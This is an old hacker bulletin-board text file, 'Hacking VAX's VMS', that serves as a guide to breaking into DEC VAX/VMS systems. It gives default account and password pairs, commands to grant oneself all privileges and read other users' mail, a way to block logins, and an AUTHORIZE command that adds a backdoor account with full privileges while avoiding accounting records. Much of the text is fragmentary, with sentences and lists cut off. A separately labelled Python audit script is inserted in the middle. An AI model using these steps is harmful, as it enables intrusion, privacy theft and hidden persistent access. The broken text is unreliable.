Unauthorised Access UK 0636-708063 10pm-7am 12oo/24oo
HACKING VAX'S VMS
The VAX is made by DEC (Digital Equipment Corp) and can run a variety
of operating systems. In this file I will talk about VMS (Virtual
Memory Operating System). VMS also runs on the PDP-11; both mainframes
are 32-bit machines with a 32-bit virtual address space.
When you first connect to a VAX you type either a return, a ctrl-c or
a ctrl-y. It will then respond with something similar to this:
The most frequent way of gaining access to a computer is by using a
'default' password; this, by the way, is not very successful.
When DEC sells a VAX/VMS, the system comes equipped with 4 accounts:
DEFAULT : This serves as a template in creating user records in the
          UAF (User Authorization File). A new user record is assigned
          the values of the default record except where the system
          manager changes those values. The default record can be
          modified but cannot be deleted from the UAF.
SYSTEM  : Provides a means for the system manager to log in with full
          privileges. The SYSTEM record can be modified but cannot be
          deleted from the UAF.
FIELD   : Permits DIGITAL field service personnel to check out a new
          system. The FIELD record can be deleted once the system is
SYSTEST : Provides an appropriate environment for running the User
          Environment Test Package (UETP). The SYSTEST record can be
          deleted once the system is installed.
Usually the SYSTEM MANAGER adds, deletes, and modifies these records
SYSTEM    MANAGER or OPERATOR
FIELD     SERVICE or TEST
DEFAULT   USER or DEFAULT
SYSTEST   UETP or SYSTEST
Other typical VMS accounts are:
Or a combination of the various usernames and passwords. If none of
these get you in, then you should try another system unless you have
a way of getting an account either by trashing or other means.
You will know that you are in by receiving the prompt of a dollar sign
($). You will be popped into the default directory which is dependent
on what account you logged in as. If you get in as system manager
(highly unlikely) you have full access....
access, but you may have the privileges to give yourself full access.
To give privs to yourself:
$ SET PROCESS/PRIVS=ALL
The VMS system has full help files available by typing HELP. You can
use the wildcard character of an '*' to list out info on every
$ help *
When you first log on, it may be to your advantage to get a list of all
users currently logged onto the system, if there are any at all. You
can do this by:
$ SHOW USERS
VAX/VMS Interactive Users-Total=4
TTD2: FIELD 004E02FF
TTD1: SYSMAN 0043552E
TXB3 TRTRTRRTR 01190057
there are people logged in, especially the system manager, or the
account you are logged on as appears twice, log out straight away
and call back later. You do not want to call too late though as the
To communicate with other users or other hackers that are on the
$ PHONE Username
$ SHOW NETWORK
This will invoke the Personal Mail Utility, you can then either read
your mail or select help....
To see what you have in your directory type:
To get a list of directories on the system type:
$ DIR *.*
When a VAX/VMS is first installed, it comes with 9 directories which
are not listed when you execute the DIR *.* command:
This directory contains various macro and object libraries.
This directory contains files used in managing the operating system.
This directory contains text files and help libraries for the HELP
This is the directory for the error log file (ERRLOG.SYS).
This directory contains files used in testing the functions of the
This directory contains system diagnostic programs.
This directory contains files used in applying system updates.
This directory contains sample driver programs, user-written system
This directory contains the executable images of most of the functions
of the operating system.
File-Type:  Description:        Command:
.hlp        system help file    TYPE filename
.dat        data file           TYPE filename
.msg        message file        TYPE filename
.doc        Documentation       TYPE filename
.log        LOG file            TYPE filename
.err        ERROR msg file      TYPE filename
.seq        sequential file     TYPE filename
.sys        system file         FILE-NAME
.exe        executable file     FILE-NAME
.com        command file        COMMAND NAME
.bas        basic file          RUN file-name
.txt        ascii text file     TYPE filename
There are others but you won't see them as much as the above. You can
change the directories either by using the CHANGE command or by using
the SET DEFAULT command:
$ SET DEFAULT
You can now list and execute the files in this directory without first
the directory name followed by the filename as long as you have
view files within directories that you cannot default to by:
$ TYPE LOD.MAI;1
This will list the contents of the file LOD.MAI;1 in the directory of
The use of wildcards is very helpful when you desire to view all the
mail or something on the system. To list out all the users' mail if you
As you may have noticed, mail files have the extension of MAI at the
end. The ;1 or ;2 etc. are used to number files with the same name.
user possessing them could cause to the system:
NONE - No privileges
NORMAL - minimum privileges to use the system.
GROUP - Potential to interfere with members of the same group.
DEVOUR - Potential to devour noncritical system-wide resources.
SYSTEM - Potential to interfere with normal system operation.
FILE - Potential to compromise file security.
ALL - Potential to control the system (wouldn't that be good ahah).
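
Added example (not part of the original file): a system manager's audit
that uses the privilege categories above and the default accounts listed
earlier to flag UAF records worth reviewing. The privilege-to-category
mapping, the function names and the sample records are assumptions made
for this illustration.

```python
# Added audit example, not from the original file. SAMPLE is constructed data.
# The privilege-to-category mapping is an assumption taken from the usual VMS
# privilege classes; check it against your release's security guide.

# Categories in increasing order of damage potential, as listed in the text.
CATEGORIES = ["NONE", "NORMAL", "GROUP", "DEVOUR", "SYSTEM", "FILE", "ALL"]
_CLASSES = {
    "NORMAL": "NETMBX TMPMBX",
    "GROUP": "GROUP GRPPRV",
    "DEVOUR": "ACNT ALLSPOOL BUGCHK EXQUOTA GRPNAM PRMCEB PRMGBL PRMMBX SHMEM",
    "SYSTEM": "ALTPRI OPER PSWAPM SECURITY SYSLCK WORLD",
    "FILE": "DIAGNOSE SYSGBL VOLPRO",
    "ALL": "BYPASS CMEXEC CMKRNL DETACH LOG_IO PFNMAP PHY_IO READALL "
           "SETPRV SYSNAM SYSPRV",
}
PRIV_CATEGORY = {p: c for c, names in _CLASSES.items() for p in names.split()}
# Default accounts the text says can be deleted after installation.
REMOVABLE_DEFAULTS = {"FIELD", "SYSTEST"}

def highest_category(privs):
    """Most dangerous category held; unknown privilege names count as ALL."""
    ranks = [CATEGORIES.index(PRIV_CATEGORY.get(p.upper(), "ALL")) for p in privs]
    return CATEGORIES[max(ranks, default=0)]

def audit(accounts, threshold="SYSTEM"):
    """Return (account, finding) pairs for a {username: [privileges]} mapping."""
    limit = CATEGORIES.index(threshold)
    findings = []
    for name in sorted(accounts):
        user, cat = name.upper(), highest_category(accounts[name])
        if user in REMOVABLE_DEFAULTS:
            findings.append((user, "default account still present"))
        # SYSTEM is expected to hold full privileges, so it is not flagged.
        if user != "SYSTEM" and CATEGORIES.index(cat) >= limit:
            findings.append((user, "privilege category " + cat))
    return findings

SAMPLE = {  # constructed records, e.g. transcribed from a UAF listing
    "SYSTEM": ["SETPRV", "SYSPRV", "CMKRNL"],
    "FIELD": ["SETPRV", "TMPMBX", "NETMBX"],
    "SYSTEST": ["TMPMBX", "NETMBX"],
    "JSMITH": ["TMPMBX", "NETMBX"],
    "OPS1": ["OPER", "TMPMBX"],
    "BUILD": ["GRPPRV", "EXQUOTA"],
}

if __name__ == "__main__":
    for account, finding in audit(SAMPLE):
        print(account + ": " + finding)
```
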
The User Authorization File contains the names of the users who may
log into the system and also contains a record of the users
and a member number.
names for file access.
automatically at login time.
the ctrl-y functions and lock user passwords.
by the user at login time.
and modify records in the UAF.
The AUTHORIZE Utility allows you to modify the information in the UAF.
The commands for AUTHORIZE are:
ADD Username        Adds a record to the UAF.
EXIT (or CTRL-Z)    Returns you to command level.
HELP                Lists the AUTHORIZE commands.
LIST                Creates a listing file of UAF records.
MODIFY Username     Modifies a record.
REMOVE Username     Deletes a record.
SHOW                Displays UAF records.
The most useful besides ADD is the SHOW command. SHOW displays reports
for selected UAF records. You can get a /BRIEF listing or a /FULL
listing. But before you do that, you may want to make sure no one is
logged on besides you; to make sure no one can log on, type the
$ SET LOGINS /INTERACTIVE=0
This establishes the max number of users able to log in to the system.
This command does not affect users currently logged on.
To list out the userfile do the following:
$ SET DEFAULT
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF
Unfortunately you cannot get a listing of passwords, though you can get
a listing of all the users as shown above. The passwords are
encrypted just like on Unix systems.
UAF> ADD /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
/DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY= /PRIVS=ALL
COMMAND ENCLOSED IN BRACKETS....
OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
This file was written by Terry Gilligan. If you want any more info on
the VAX, contact me; I will help you as much as I can. Have lots more
info on VAX security if anyone is interested.